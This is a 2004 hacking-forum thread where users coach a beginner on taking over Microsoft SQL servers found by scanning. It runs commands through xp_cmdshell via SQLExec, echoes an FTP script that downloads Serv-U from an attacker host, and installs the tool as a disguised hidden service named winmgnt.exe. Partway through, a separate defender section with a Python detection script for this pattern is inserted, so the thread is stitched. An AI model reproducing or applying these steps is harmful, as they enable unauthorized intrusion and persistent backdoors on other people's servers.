arun0075
Feb 12 2004, 05:03 PM
hmm... first time in my life i scanned for SQL and this time i got hit by a lot of ips wow but i don't know how to use SQL for rooting.. i always used to have nt for rooting as bots before but is there any way to root SQL.. hmm.. how to upload files and execute them, is there a simple way for it.. i got SQLexec but to be true i am very new to SQL stuff

NE HELP
Thom
Feb 12 2004, 05:08 PM
It's just like cmd.exe but with a few differences, just make it connect to an FTP, DL some files and launch them...
tyler.durden
Feb 12 2004, 05:08 PM
| QUOTE (arun0075 @ Feb 12 2004, 05:03 PM) |
hmm... first time in my life i scanned for SQL and this time i got hit by a lot of ips wow but i don't know how to use SQL for rooting.. i always used to have nt for rooting as bots before but is there any way to root SQL.. hmm.. how to upload files and execute them, is there a simple way for it.. i got SQLexec but to be true i am very new to SQL stuff
NE HELP |
with SQLExec you don't need to know SQL...
it uses xp_cmdshell to run an OS command... every time the command ends the session is closed, so if you run a command like "cd <dir>", at the next run you are no longer in that dir. So you must create your script by echoing.
I hope this can help you a little bit... if I got something wrong please tell me
ShadowRun
Feb 12 2004, 05:12 PM
if u have sqlexec then it's simple
i wonder if u know what it's for

u should say sqlserver

sql is simple query language
and is used in all databases
there's a huge difference between
mysql | ms sql server | oracle
greetz
F34R
Feb 14 2004, 04:47 PM
All you need are SQLexec, an FTP server, and a rootkit to get the job done.
Use ECHO commands.
There have been several posts in the past on this subject... just do a little browsing and you'll find what you need.
Cya.
t00sTr0nG
Feb 14 2004, 06:59 PM
or you can use netcat, but with SQLexec it is easier!
THX
t00sTr0nG
eXist
Feb 14 2004, 11:28 PM
One of the simplest methods is just to echo commands into a .txt file and then tell it to use it with FTP. This method won't always work, as you might be met with SQL_ERROR when trying to echo into a file.
As has been said before, check through the forums and you'll find many threads/posts that will help you.
fre4k
Feb 15 2004, 02:05 PM
here is some shit for you, it can help you in your sqlexec/cmd
| CODE |
ASSOC    Displays or modifies file extension associations
AT       Schedules commands and programs to run on a computer.
ATTRIB   Displays or changes file attributes.
BREAK    Sets or clears extended CTRL+C checking.
CACLS    Displays or modifies access control lists (ACLs) of files.
CALL     Calls one batch program from another.
CD       Displays the name of or changes the current directory.
CHCP     Displays or sets the active code page number.
CHDIR    Displays the name of or changes the current directory.
CHKDSK   Checks a disk and displays a status report.
CHKNTFS  Displays or modifies the checking of disk at boot time.
CLS      Clears the screen.
CMD      Starts a new instance of the Windows 2000 command interpreter.
COLOR    Sets the default console foreground and background colors.
COMP     Compares the contents of two files or sets of files.
COMPACT  Displays or alters the compression of files on NTFS partitions.
CONVERT  Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY     Copies one or more files to another location.
DATE     Displays or sets the date.
DEL      Deletes one or more files.
DIR      Displays a list of files and subdirectories in a directory.
DISKCOMP Compares the contents of two floppy disks.
DISKCOPY Copies the contents of one floppy disk to another.
DOSKEY   Edits command lines, recalls Windows 2000 commands, and creates macro
ECHO     Displays messages, or turns command echoing on or off.
ENDLOCAL Ends localization of environment changes in a batch file.
ERASE    Deletes one or more files.
EXIT     Quits the CMD.EXE program (command interpreter).
FC       Compares two files or sets of files, and displays the differences between them.
FIND     Searches for a text string in a file or files.
FINDSTR  Searches for strings in files.
FOR      Runs a specified command for each file in a set of files.
FORMAT   Formats a disk for use with Windows 2000.
FTYPE    Displays or modifies file types used in file extension associations.
GOTO     Directs the Windows 2000 command interpreter to a labeled line in a batch program.
GRAFTABL Enables Windows 2000 to display an extended character set in graphics mode.
HELP     Provides Help information for Windows 2000 commands.
IF       Performs conditional processing in batch programs.
LABEL    Creates, changes, or deletes the volume label of a disk.
MD       Creates a directory.
MKDIR    Creates a directory.
MODE     Configures a system device.
MORE     Displays output one screen at a time.
MOVE     Moves one or more files from one directory to another directory.
PATH     Displays or sets a search path for executable files.
PAUSE    Suspends processing of a batch file and displays a message.
POPD     Restores the previous value of the current directory saved by PUSHD.
PRINT    Prints a text file.
PROMPT   Changes the Windows 2000 command prompt.
PUSHD    Saves the current directory then changes it.
RD       Removes a directory.
RECOVER  Recovers readable information from a bad or defective disk.
REM      Records comments (remarks) in batch files or CONFIG.SYS.
REN      Renames a file or files.
RENAME   Renames a file or files.
REPLACE  Replaces files.
RMDIR    Removes a directory.
SET      Displays, sets, or removes Windows 2000 environment variables.
SETLOCAL Begins localization of environment changes in a batch file.
SHIFT    Shifts the position of replaceable parameters in batch files.
SORT     Sorts input.
START    Starts a separate window to run a specified program or command.
SUBST    Associates a path with a drive letter.
TIME     Displays or sets the system time.
TITLE    Sets the window title for a CMD.EXE session.
TREE     Graphically displays the directory structure of a drive or path.
TYPE     Displays the contents of a text file.
VER      Displays the Windows 2000 version.
VERIFY   Tells Windows 2000 whether to verify that your files are written correctly to a disk.
VOL      Displays a disk volume label and serial number.
XCOPY    Copies files and directory trees.
|
And here are the echo commands, so that you can upload servu from a put into your target:
First make a dir:
mkdir c:\winnt\addins\setup\inst
Then these:
echo open 208.*.*.*>>c:\winnt\addins\setup\inst\script.txt
echo anonymous>>c:\winnt\addins\setup\inst\script.txt
echo anonymous@lol.com>>c:\winnt\addins\setup\inst\script.txt
echo BINARY>>c:\winnt\addins\setup\inst\script.txt
echo get serv-u.exe>>c:\winnt\addins\setup\inst\script.txt
echo get serv-u.ini>>c:\winnt\addins\setup\inst\script.txt
echo quit>>c:\winnt\addins\setup\inst\script.txt
To start the script try:
ftp -s:c:\winnt\addins\setup\inst\script.txt
Now wait a while...
Now you have Serv-u in c:\ and you can move it where you want! The commands are on top

and start:
start c:\....
good luck

-fre4k
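For defenders reading this thread: the sequence the posts above describe (xp_cmdshell running each line as a separate cmd.exe, an FTP script assembled with echo, then `ftp -s:` and a service start) stands out in process-creation logs. The following is an added example, not part of the original thread; the record shape (parent image, command line), the paths, the address and the rule names are constructed assumptions.

```python
import re

# Constructed process-creation records (parent image, command line); not real logs.
SAMPLE_EVENTS = [
    ("sqlservr.exe", r"cmd.exe /c mkdir c:\temp\stage"),
    ("sqlservr.exe", r"cmd.exe /c echo open 192.0.2.10>>c:\temp\stage\script.txt"),
    ("sqlservr.exe", r"cmd.exe /c echo get tool.exe>>c:\temp\stage\script.txt"),
    ("sqlservr.exe", r"cmd.exe /c ftp -s:c:\temp\stage\script.txt"),
    ("explorer.exe", r"cmd.exe /c echo build ok>>c:\build\log.txt"),
    ("sqlservr.exe", r"cmd.exe /c net start example-svc"),
]

ECHO_TO_FILE = re.compile(r'\becho\s+.*?>>?\s*"?([^\s"]+)', re.I)
FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?\s+.*?-s:"?([^\s"]+)', re.I)
SERVICE_START = re.compile(r"\bnet(?:\.exe)?\s+start\b", re.I)


def analyze(events):
    """Return (event index, rule name) pairs for children of SQL Server."""
    findings = []
    echoed = set()  # lower-cased files written via echo redirection
    for idx, (parent, cmdline) in enumerate(events):
        # xp_cmdshell runs every command as a fresh cmd.exe under sqlservr.exe,
        # so the parent image is the primary signal; other parents are ignored.
        if parent.lower() != "sqlservr.exe":
            continue
        findings.append((idx, "shell-from-sqlservr"))
        m = ECHO_TO_FILE.search(cmdline)
        if m:
            echoed.add(m.group(1).lower())
        m = FTP_SCRIPT.search(cmdline)
        if m and m.group(1).lower() in echoed:
            # ftp -s: is reading a script that earlier echo lines assembled
            findings.append((idx, "ftp-script-built-by-echo"))
        if SERVICE_START.search(cmdline):
            findings.append((idx, "service-start-from-sqlservr"))
    return findings


if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx][1]}")
```

On a database server that has no business need for xp_cmdshell, the first rule alone is worth alerting on; the other two add context for triage.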
jak3c
Feb 15 2004, 06:47 PM
yes, the best way is echoing your commands or tftping your files
desisam
Feb 16 2004, 01:52 AM
echo open 208.*.*.*>>
what this * means///help me
Nexcess
Feb 16 2004, 02:46 AM
hrm does sqlexec work on mysql as well?
SyN/AcK
Feb 16 2004, 04:56 AM
| QUOTE (desisam @ Feb 16 2004, 01:52 AM) |
echo open 208.*.*.*>> what this * means///help me |
He's starring out the last two octets of his IP address for anonymity.
SyN/AcK
Feb 16 2004, 05:07 AM
| QUOTE (Nexcess @ Feb 16 2004, 02:46 AM) |
| hrm does sqlexec work on mysql as well? |
No it does not. Only MS SQL.
arun0075
Feb 17 2004, 02:23 AM
thanks u guys it helped me a lot and also Sqlexec work on MS_SQL for me..
arun0075
Feb 19 2004, 01:23 AM
dude hmmm.. i have successfully uploaded the files but where did the files get uploaded, no idea.. and can u please tell me the command to move the file and also to start it.. please thanks
arun0075
Feb 19 2004, 01:47 AM
hmm.. ok i found out where the files got uploaded
and now when i start the serv-u it get stuck see this below
| QUOTE |
Sqlcmd>start c:\winnt\system32\winmgnt.exe
|
and this is end it's not starting the file

why is that
setthesun
Feb 19 2004, 06:26 AM
Also you can use the MS tool osql.exe for executing remote commands and dumping remote / local databases.
Rave4
Feb 19 2004, 08:27 AM
There is a program called sqlexecgui for that.
Stephen79
Feb 19 2004, 09:17 AM
| QUOTE (arun0075 @ Feb 19 2004, 02:47 AM) |
hmm.. ok i found out where the files got uploaded and now when i start the serv-u it get stuck see this below
| QUOTE | Sqlcmd>start c:\winnt\system32\winmgnt.exe
|
and this is end it's not starting the file  why is that |
should be
| CODE |
net start servicename
|
arun0075
Feb 19 2004, 04:39 PM
is there any other software like sqlexec which has the same function as sqlexec
arun0075
Feb 20 2004, 08:46 AM
hmmm see the following errors i get when i want to start the serv-u ftp :
The first type of error:
| QUOTE |
Sqlcmd>net start c:\winnt\system32\winmgnt.exe
The service name is invalid.
More help is available by typing NET HELPMSG 2185. |
The second type of error
| QUOTE |
Sqlcmd>net start winmgnt.exe
The service name is invalid.
More help is available by typing NET HELPMSG 2185. |
The third type of error this is too funny it get stuck at this point only lol and don't even start serv-u
| QUOTE |
Sqlcmd>start c:\winnt\system32\winmgnt.exe
and also this
Sqlcmd>start winmgnt.exe |
EDIT: so what is the ways which i can use to start serv-u on sql please help..
rvd
Feb 20 2004, 09:58 AM
I use sqlexec if the files are uploaded i do:
c:\winnt\system32\winmgnt.exe /i
net start serv-u
or
net start winmgnt.exe
if everything is all right then you can connect to your server @ the port you entered in your host.ini (or servudeamon.ini)
Hope this helps greetz
DumpZ
Mar 1 2004, 02:32 PM
To start the files i always do
| CODE |
serv-u.exe /i serv-u.exe /h
net start serv-u
|
IcedOut3E
Mar 1 2004, 11:50 PM
Do the files, like nc.exe and serv-u.exe, have to be in the same directory that sqlexec is in?
Reason I ask is I am having trouble getting files to upload.
Killaloop
Mar 2 2004, 04:04 PM
before you want to hack anything.
learn the damned dos commands, booh you even should know them if it wasn't for hacking.
since you kids use sqlexec to send cmds to the mssql server you use the xp_cmdshell which passes your input directly to cmd.exe and therefore every dos command will work.
so stop doing shit with other people's servers if you don't even know how to start a file using cmd line.
I know this is beginner section but does this mean all you are able to do is press the button to boot your pc and shut it down or are you able to use your brains?
I guess microsoft made it too easy for kids to use their putters.
it really sucks
usch
Mar 2 2004, 04:19 PM
yeah

type "help" in your console at your home pc and study a bit. it is awesome and necessary for hacking sql
Falcor
Apr 1 2004, 07:25 PM
winmgnt /i /h
net start secman
Montague
Apr 5 2004, 09:07 AM
I start the ServU's (whatever) like this:
c:\mydirectory\bla\SQLSecurity32.exe c:\mydirectory\bla\SQLSecurity32.ini
And it works for me.
BacKZoiD
Killaloop
Apr 5 2004, 09:31 AM
| QUOTE (BacKZoiD @ Apr 5 2004, 09:07 AM) |
I start the ServU's (whatever) like this:
c:\mydirectory\bla\SQLSecurity32.exe c:\mydirectory\bla\SQLSecurity32.ini
And it works for me.
BacKZoiD |
yep
until the next reboot. then your serv-u won't run anymore since you didn't add it as a service.
mfld
Apr 7 2004, 03:44 AM